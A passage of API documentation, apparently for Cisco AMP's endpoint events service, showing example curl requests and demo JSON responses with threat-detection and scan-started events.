              "type_id": 1
            }
          ]
        },
        "remediated": false,
        "severity": "medium",
        "silent": false,
        "start_ts": 1647533684,
        "tactics": [
          "TA0002",
          "TA0005"
        ],
        "type": "activity",
        "normalized": {
          "observables": {
            "file": {
              "name": [
                "powershell.exe",
                "wmiprvse.exe"
              ],
              "path": [
                "c:\\windows\\system32\\windowspowershell\\v1.0",
                "c:\\windows\\system32\\wbem"
              ]
            }
          },
          "name": "wmiprvse launched encoded powershell command"
        },
        "demo": true
      }
    }
  ]
}

Fetch events that are newer than a given timestamp

Request

Requires Authorization 
GET /v1/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&offset=10&limit=10
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v1/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&offset=10&limit=10'

Response

Shortened for readability 

content-type: application/json
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 878
strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2811
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"f047f765639245b1bfea8215c5693d7b"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2022-03-18T11:55:11Z

{
  "version": "v1.2.0",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v1/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&offset=10&limit=10",
      "prev": "https://api.eu.amp.cisco.com/v1/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&limit=10&offset=0",
      "next": "https://api.eu.amp.cisco.com/v1/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&limit=10&offset=20"
    },
    "results": {
      "total": 1165,
      "current_item_count": 10,
      "index": 10,
      "items_per_page": 10
    }
  },
  "data": [
    {
      "id": 6533671385032557000,
      "timestamp": 1647599259,
      "timestamp_nanoseconds": 25000000,
      "date": "2022-03-18T10:27:39+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.File.MalParent",
      "detection_id": "6533671385032556606",
      "connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
      "group_guids": [
        "6a208a97-badf-4296-87c2-40779ffff0af"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
        "hostname": "Demo_AMP_Threat_Audit",
        "external_ip": "149.20.236.110",
        "user": "johndoe",
        "active": true,
        "network_addresses": [
          {
            "ip": "237.160.117.93",
            "mac": "b9:f4:70:d0:30:68"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v1/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
          "trajectory": "https://api.eu.amp.cisco.com/v1/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca/trajectory",
          "group": "https://api.eu.amp.cisco.com/v1/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "ekjrngjker.exe",
        "file_path": "\\\\?\\C:\\ekjrngjker.exe",
        "identity": {
          "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
          "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
          "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
        }
      },
      "tactics": [
        "TA0042"
      ],
      "techniques": [
        "T1204.003"
      ]
    },
    {
      "id": 6533671385032557000,
      "timestamp": 1647599259,
      "timestamp_nanoseconds": 14000000,
      "date": "2022-03-18T10:27:39+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.File.MalParent",
      "detection_id": "6533671380737589309",
      "connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
      "group_guids": [
        "6a208a97-badf-4296-87c2-40779ffff0af"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
        "hostname": "Demo_AMP_Threat_Audit",
        "external_ip": "149.20.236.110",
        "user": "johndoe",
        "active": true,
        "network_addresses": [
          {
            "ip": "237.160.117.93",
            "mac": "b9:f4:70:d0:30:68"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v1/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
          "trajectory": "https://api.eu.amp.cisco.com/v1/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca/trajectory",
          "group": "https://api.eu.amp.cisco.com/v1/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "ekjrngjker.exe",
        "file_path": "C:\\ekjrngjker.exe",
        "identity": {
          "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
          "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
          "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
        }
      },
      "tactics": [
        "TA0042"
      ],
      "techniques": [
        "T1204.003"
      ]
    }
  ]
}

Fetch list of events filtered by SCAN_STARTED event type

Request

Requires Authorization 
GET /v1/events?event_type%5B%5D=554696714&limit=10
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v1/events?event_type%5B%5D=554696714&limit=10'

Response

Shortened for readability 

content-type: application/json
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 878
strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2810
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"5a86532820285711d6cc9edb763eaed0"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2022-03-18T11:55:11Z

{
  "version": "v1.2.0",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v1/events?event_type%5B%5D=554696714&limit=10"
    },
    "results": {
      "total": 10,
      "current_item_count": 10,
      "index": 0,
      "items_per_page": 10
    }
  },
  "data": [
    {
      "id": 5832364858376454000,
      "timestamp": 1647598024,
      "timestamp_nanoseconds": 772000000,
      "date": "2022-03-18T10:07:04+00:00",
      "event_type": "Scan Started",
      "event_type_id": 554696714,
      "connector_guid": "8571ee01-fecb-4472-b583-27a9b3a8751f",
      "group_guids": [
        "af1e7d79-880b-4aaf-84d4-06149fef0cd2",
        "8f6c4774-0e8e-4546-8ebd-4e1b035473b4"
      ],
      "computer": {
        "connector_guid": "8571ee01-fecb-4472-b583-27a9b3a8751f",
        "hostname": "Demo_ZAccess",
        "external_ip": "142.204.149.196",
        "active": true,
        "network_addresses": [
          {
            "ip": "236.208.251.95",
            "mac": "6c:0d:af:5b:90:51"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v1/computers/8571ee01-fecb-4472-b583-27a9b3a8751f",
          "trajectory": "https://api.eu.amp.cisco.com/v1/computers/8571ee01-fecb-4472-b583-27a9b3a8751f/trajectory",
          "group": "https://api.eu.amp.cisco.com/v1/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "scan": {
        "description": "C:\\Program Files\\DVD Maker"
      }
    },
    {
      "id": 5832364789656977000,
      "timestamp": 1647598008,
      "timestamp_nanoseconds": 193000000,
      "date": "2022-03-18T10:06:48+00:00",
      "event_type": "Scan Started",
      "event_type_id": 554696714,
      "connector_guid": "8571ee01-fecb-4472-b583-27a9b3a8751f",
      "group_guids": [
        "af1e7d79-880b-4aaf-84d4-06149fef0cd2",
        "8f6c4774-0e8e-4546-8ebd-4e1b035473b4"
      ],
      "computer": {
        "connector_guid": "8571ee01-fecb-4472-b583-27a9b3a8751f",
        "hostname": "Demo_ZAccess",
        "external_ip": "142.204.149.196",
        "active": true,
        "network_addresses": [
          {
            "ip": "236.208.251.95",
            "mac": "6c:0d:af:5b:90:51"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v1/computers/8571ee01-fecb-4472-b583-27a9b3a8751f",
          "trajectory": "https://api.eu.amp.cisco.com/v1/computers/8571ee01-fecb-4472-b583-27a9b3a8751f/trajectory",
          "group": "https://api.eu.amp.cisco.com/v1/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "scan": {
        "description": "C:\\Program Files\\Microsoft Games"
      }
    }
  ]
}